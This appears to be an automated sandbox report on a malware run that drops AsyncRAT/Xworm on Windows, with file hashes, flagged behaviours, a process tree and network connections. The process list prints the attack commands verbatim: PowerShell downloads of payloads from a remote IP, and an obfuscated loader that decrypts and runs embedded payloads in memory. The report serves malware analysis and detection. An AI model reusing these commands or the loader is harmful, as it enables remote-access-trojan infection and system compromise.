| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | fc1e372741f86ef61369556ba925bec0 |
| SHA1 | a82a7e51edcf14d237393045cf4e84f2abda0d21 |
| SHA256 | 2ce2b8dfd46b6b3a4bc293d9aff991671d7607229785bba248c9f00b006665fe |
| SHA512 | a4a24f30f334638d89128c600ca55c108bf670c20901647653bfc4b13e72d2b1bf0d7c3b7515152f1ddddede3a0b68e4f1f9eb42c9419f7c483b256684450bc7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | deed430de95402f99f204a5089143f85 |
| SHA1 | 9831ba45b520e716b79ff64fdc6350613656ccde |
| SHA256 | c2f68eb7fccc7a04c566e2c5c9043cbe00ffacc30c616c708b205341d0189d38 |
| SHA512 | 08f6f08a04ccd3fefcf00679a74f1de96d9824d4bf112e8255448bb570e6807eba566397a40667d5e40a7d3197f32e89ea57761611f54844e6000225a8f205e3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | a9dcc6c69f3efb5357db8843235fabf7 |
| SHA1 | 82ecf2da327e3fd534c92df9976b4e41c00553cc |
| SHA256 | cb74c952db2b01d27baafb7dd95ee7bfc739df42515a56f382f9601dfa0777cc |
| SHA512 | 46a539854d000d3566445665f1ab1b49d49c89169c16e10aab3b0c5291d5a6292b4408cc95f092be725d3ea016b57ea29f5817c4ab546c412640fdc5f0d2c547 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | 9db484d7470447755ef6e877e004c483 |
| SHA1 | 232ef8f4c91e3b4c7b5e5e1a1664ff6304b5493d |
| SHA256 | 45a2d9e2c3ea80b0c68b186e3493c2952a9cb2834a4f567a716ad00f72b1d8af |
| SHA512 | a1f85f219d52564a014ffa65004466234375bacff97dbd1d5dbe747221f8dd66492ddcbefac7dab427bdd766a89f0407ee2e7b52c0ca2493cb48f99d22742b0d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| Hash | Value |
|---|---|
| MD5 | b535a709dced7eaf9be112ba9005f02c |
| SHA1 | 168b930629bc3d2db8453fbe6c9a39ea8488858d |
| SHA256 | 60ca838cdd0e1128e667db9535c4c875a3e58b18d871eefe4595bf24d4bb8c54 |
| SHA512 | 1c5d992c12a7cc7aa392017ebdb6ab7ee450abdb52f1f63fb8963635900b2050fe87b1f4fd8098f408be5254bde9b80c2bab3afe7fb5e8ed0e427f6248f72837 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | 1647c14ba47572bd32e95637a65b71dd |
| SHA1 | 5033c6b616b2ad572f0bfd8a9e4aaca6b462ac84 |
| SHA256 | 5c112ee0d183d63b4123b7baaa0611799cb17ce8a1c4a0fcb888c1dedeb7d6ae |
| SHA512 | 3164660d48f81ce075bbd7f8fa30db8b0e77489a70bd8eda11fe654d1b4d06d45cba7ac23a4b7b4d70fc038ba6e51ac963f63632dd9353312b61278b114fdd03 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| Hash | Value |
|---|---|
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | ec11c9c0bfc619a33c65210f275856be |
| SHA1 | 5bea337933b77bb571e7e85c3f279bb668efaaab |
| SHA256 | d6184760bbb9a8b3dd884cb0d781c2f41c7bdee80f4d8d35972ea01a0cbb83df |
| SHA512 | ddc7adbcea76c18ba6471306e6a377f1d8c7657219c5271c9eadb5a9f042c398bf5778a31e05ed012a9fc17a64c5b088298a72eda129a8f3069c192b0d1880c6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | 5ed6146a82e139be6727f6b23350677a |
| SHA1 | ad0a86e2b6b593d60dfe936bc35b2a6bfdc20ae9 |
| SHA256 | 7e4c6eb1c8af57a2f6e80fbe938ae59daac261baef4d89a4b22c04cd66995876 |
| SHA512 | 6b0b905fb77c6598775a8686c582556646719ec486f16f87b925e3e40a77dad79a0d7111568da11ef222ba0cffd976c076ecdb25bf9a7f6be27a484ebab18053 |
Analysis: behavioral2
Detonation Overview
Submitted: 2024-06-03 10:59
Reported: 2024-06-03 11:01
Platform: win10v2004-20240426-en
Max time kernel: 137s
Max time network: 150s
Command Line
Signatures
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4396 created 3528 | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | C:\Windows\Explorer.EXE |
| PID 5672 created 3528 | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | C:\Windows\Explorer.EXE |
| PID 5140 created 3528 | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | C:\Windows\Explorer.EXE |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
Loads dropped DLL
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\new.cmd"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gravity-finger-rp-sympathy.trycloudflare.com/VB.pdf
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb552146f8,0x7ffb55214708,0x7ffb55214718
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5220 /prefetch:6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3004 /prefetch:2
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe time.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe kam.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe update.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe upload.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe info.py
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gravity-finger-rp-sympathy.trycloudflare.com/VB.pdf
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb552146f8,0x7ffb55214708,0x7ffb55214718
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//startup.cmd' -OutFile 'C:\Users\Admin\Downloads\startup.cmd' }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//las.cmd' -OutFile 'C:\Users\Admin\Downloads\las.cmd' }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mBikq5Vr6iXQSAx9AvNsTlJQx4QRAlMUymooTmEoTP8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9tB8qnL1HE5GeN2j8XvVTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $osFJR=New-Object System.IO.MemoryStream(,$param_var); $TnAfO=New-Object System.IO.MemoryStream; $TmplX=New-Object System.IO.Compression.GZipStream($osFJR, [IO.Compression.CompressionMode]::Decompress); $TmplX.CopyTo($TnAfO); $TmplX.Dispose(); $osFJR.Dispose(); $TnAfO.Dispose(); $TnAfO.ToArray();}function execute_function($param_var,$param2_var){ $uDFqM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RXfqD=$uDFqM.EntryPoint; $RXfqD.Invoke($null, $param2_var);}$ktYZz = 'C:\Users\Admin\Downloads\las.cmd';$host.UI.RawUI.WindowTitle = $ktYZz;$VTjTb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ktYZz).Split([Environment]::NewLine);foreach ($HurkY in $VTjTb) { if ($HurkY.StartsWith(':: ')) { $MHhXk=$HurkY.Substring(3); break; }}$payloads_var=[string[]]$MHhXk.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//xff.cmd' -OutFile 'C:\Users\Admin\Downloads\xff.cmd' }"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gravity-finger-rp-sympathy.trycloudflare.com | udp |
| US | 104.16.230.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.230.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| GB | 57.128.129.21:8080 | 57.128.129.21 | tcp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 21.129.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.101.63.23.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| US | 52.165.165.26:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| IE | 20.166.126.56:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 52.165.165.26:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 52.165.165.26:443 | | tcp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xvern429.duckdns.org | udp |
| US | 12.202.180.134:8890 | xvern429.duckdns.org | tcp |
| GB | 57.128.129.21:8080 | 57.128.129.21 | tcp |
| GB | 57.128.129.21:8080 | 57.128.129.21 | tcp |
| US | 8.8.8.8:53 | 134.180.202.12.in-addr.arpa | udp |
| US | 8.8.8.8:53 | asyncss.duckdns.org | udp |
| US | 8.8.8.8:53 | nmds.duckdns.org | udp |
| US | 12.202.180.134:8895 | nmds.duckdns.org | tcp |
| US | 8.8.8.8:53 | xgmn934.duckdns.org | udp |
| US | 12.202.180.134:8896 | xgmn934.duckdns.org | tcp |
| GB | 57.128.129.21:8080 | 57.128.129.21 | tcp |
Files
memory/4924-1-0x00007FFB53CD3000-0x00007FFB53CD5000-memory.dmp
memory/4924-2-0x00000285C9060000-0x00000285C9082000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eegmkhk5.joe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ecdc2754d7d2ae862272153aa9b9ca6e |
| SHA1 | c19bed1c6e1c998b9fa93298639ad7961339147d |
| SHA256 | a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7 |
| SHA512 | cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2 |
memory/4924-17-0x00007FFB53CD0000-0x00007FFB54791000-memory.dmp
memory/4924-18-0x00007FFB53CD0000-0x00007FFB54791000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 2daa93382bba07cbc40af372d30ec576 |
| SHA1 | c5e709dc3e2e4df2ff841fbde3e30170e7428a94 |
| SHA256 | 1826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30 |
| SHA512 | 65635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b |
\??\pipe\LOCAL\crashpad_2400_HZAPZRXYFGFZOWGS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a11f0b5572c84e597608fc3eccdcc453 |
| SHA1 | a19f63522bb2d71fde9ae8382877a0d6ecba8340 |
| SHA256 | 026f8c55f7d8c0e5aa433f6c9b6072796538317720b0f80884f5f69ca1865a74 |
| SHA512 | 285dcc548538fcbb70bd9c0b7a3c47e5c28c1a979a233be1f7db2f97880acfbb8b29c9d5d6b37b7b201ba81bc3c50f2ef2b95f8da52f774579220fcedfb138df |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 844e5d3c9824411bbcb29570f9a15ca5 |
| SHA1 | 77c95042b3d1a004653f3b2d44b996df4687a2f1 |
| SHA256 | 910224575655876a8aeeed9e78d73d8f7cc98298eeeaa1c394d658f5aab9b34c |
